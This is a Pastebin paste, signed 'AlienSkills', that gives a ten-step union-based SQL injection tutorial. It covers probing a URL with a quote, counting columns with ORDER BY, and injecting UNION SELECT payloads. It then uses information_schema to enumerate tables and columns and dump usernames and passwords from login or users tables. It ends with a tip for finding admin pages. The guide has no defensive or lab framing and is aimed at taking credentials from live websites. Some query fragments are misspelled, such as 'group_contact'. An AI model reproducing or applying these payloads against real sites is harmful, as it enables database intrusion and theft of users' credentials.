Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- **************************************
- 1.)Check if it's vulnerable
- Add ' end URL
- ******************************
- 2.)See how many columns the website has.
- Type order by 7--
- (Continue increasing number until you reach unknown columns error)
- 3.) Replace the end url number with null then Delete the order by,type union all select 1,2,3,4,5,6,7--
- (Put how many columns the site have which is 7)
- (www.Facebook.com/products.php=12)
- 4.) You'll see a few numbers choose top number or bold, Replace that number with @@Version
- Note: After you hit enter a pop up of the community version will show, if its below 5.0 you'll need to do a blind SQL injection.
- 5.) Replace the @@Version with group_contact(table_name)
- Then go to the very end of the URL type from information_schema.tables where table_schema=database()--
- 6.) You'll get a list of tables names if typed correctly.
- Note: login,login_secured and users users are probably your target ones valuable information.
- 7.) In the URL bar replace the table_name to column_name
- THEN
- *Replace information_schema.tables to
- Information_schema.columns
- 8.)You'll see the list of columns all the website. has.Pass,username,cat,ID,mail,title etc.
- Note: For this tutorial we'll select the user and pass columns.
- 9.) Replace column_name to
- username.
- Note: If you just want the user name you'll just type user name.To add more columns put username,0x3a,pass with. Information_schema.columns
- THEN
- *Replace information_schema.columns where table_schema=database()-- with
- users--
- Note: It doesn't have to be users--
- login-- or login_secure since those were one of our tables.
- 10.)You'll see a list of user names and passwords. The user namers are first since we put them first.Example Alex252:27838427
- Additional information : If you wam to get to the admin accounts go to Google search " admin page finder"
- Follow the site instructions .
- By: AlienSkills
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement